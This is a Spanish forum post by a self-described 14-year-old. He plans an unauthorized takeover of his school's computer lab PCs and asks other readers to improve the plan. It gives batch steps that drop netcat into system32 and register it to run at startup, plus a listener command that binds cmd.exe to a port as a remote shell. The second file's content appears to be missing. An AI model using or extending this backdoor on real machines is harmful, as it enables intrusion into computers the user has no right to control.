Diario de un alumno en clase de informatica
Gente, este es un post, en el que venía pensando hace tiempo y bueno, aca lo estoy haciendo. Trata de algo asi como una anecdota, o
algo "planeado" para una intrusion en las PC, de las computadoras de la escuela en la clase de informatica en la clase (no intervenir
desde una casa), para despues molestar o simplemente para matar el aburrimiento en la clase.
Esto podría ser:Un acto verídico (ya pasado), algo todavía no realizado (pero real).
NO romper lo siguiente: No se puede inventar el "escenario". Es decir algo que pasó o un escenario existente (no revelar cual XD).
Bueno empiezo con el mío:
14 computadoras (corriendo windows), en red (cable

Resulta que en clase empeze a pensar alguna forma de ir teniendo el control de las Pc de la clase, lo primero que se me ocurrió ( y que tengo bien claro)
es el netcat, hacer multiples conexiones (directas), hacia mi PC, y ahi tener una shell, y por ende, una especia de control total
comenzé a investigar, y se encontraban algunas carpetas compartidas, y razoné que se podría "sacar jugo", entonces fui a la carpeta compartida
y luego hice 3 archivos(en mi casa los cree obviamente), dos, tienen que estar en la pc vicitma.
1º archivo:coloca el netcat en system32 y se ejecuta
2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida
ejecuto los 2 archivos, y entonces estaría funcionando, la mision, solo hace falta hacer un: net view, y conectarse
pero para la ejecucion de estos archivos tiene que ser por acceso fisico (que no es un gran problema, es solo ir a la carpeta compartida
y ejecutarlos).
ARCHIVOS:
1º archivo:coloca el netcat en system32 y se ejecuta.
lo tengo en .exe (lo compile con el quick batch compiler)
es facil su funcionamiento copia de %MYFILES% a system32
y lo ejecuta
2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida.
Código
@echo off
simplemente eso.
3º archivo:ejecucion de un archivo (netcat a la escucha)
Código
@echo off start nc.exe -L -d -e cmd.exe -p 6000
simplemente eso.
Diagrama:

Como pueden ver es muy sencillo, programitas programados en batch.
si se preguntan porque los primeros dos archivos no los hice en uno solo:es porque ya lo habia intentado antes y me daba
siempre algún error.
asique decidi hacerlo por partes.
bueno aca termina, espero que no sea la ultima anecdota, o plan de intrusión.
en mi caso, todos los datos son veridicos, pero todavía no fue probado, vuelvo de un viaje

si no tienen ninguna anecdota lo que pueden hacer es como mejorrar, o facilitar, o para no tener que estar fisicamente en la pc ¬¬, a los planes estos, y si se llego hacer en la realidad por favor decir como salió todo obviamente.
PD: tengo 14 años dentro de todo esta bien jajaja
saludos